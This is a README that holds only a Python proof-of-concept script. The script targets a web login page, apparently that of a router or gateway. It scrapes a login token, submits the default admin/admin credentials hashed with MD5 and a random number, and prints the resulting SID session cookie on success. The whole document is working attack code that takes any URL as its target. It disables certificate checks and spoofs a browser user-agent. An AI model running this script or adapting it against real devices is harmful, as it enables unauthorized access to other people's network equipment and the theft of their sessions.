README.md
Rendering markdown...
# -*- encoding: utf-8 -*-
import base64
import hashlib
import random
import re
import traceback
from warnings import filterwarnings
import requests
filterwarnings("ignore")
class POC:
def __init__(self, url):
self.url = url if str.endswith(url,"/") else f"{url}/"
self.s = requests.Session()
self.s.headers.update({
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Referer": url,
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8"
})
def get_token(self):
r = self.s.get(self.url, verify=False, allow_redirects=True, timeout=10)
token_match = re.search(r'getObj\s*\(\s*"Frm_Logintoken"\s*\)\s*\.value\s*=\s*["\'](\d+)["\']', r.text,
re.IGNORECASE)
if token_match:
return token_match.group(1)
fallback = re.search(r'name="Frm_Logintoken"\s*[^>]*value="(\d+)"', r.text)
return fallback.group(1) if fallback else "13"
def verify(self):
try:
token = self.get_token()
rand_num = str(random.randint(10000000, 99999999))
pwd = "admin"
final_pwd = hashlib.md5((pwd + rand_num).encode()).hexdigest()
data = {
"frashnum": "",
"action": "login",
"Frm_Logintoken": token,
"UserRandomNum": rand_num,
"Username": "admin",
"Password": final_pwd,
"LoginId": "Login"
}
resp = self.s.post(self.url, data=data, allow_redirects=False, verify=False, timeout=10)
if resp.status_code == 302 and resp.headers.get("Location", "").endswith("start.ghtml"):
print(f"SID Cookie: {self.s.cookies.get('SID', '无')}")
print("YES!! \n User:admin\n Pwd:admin\n")
except Exception as e:
traceback.print_exc()
print(e)
if __name__ == "__main__":
import sys
arg = sys.argv
POC(arg[1]).verify()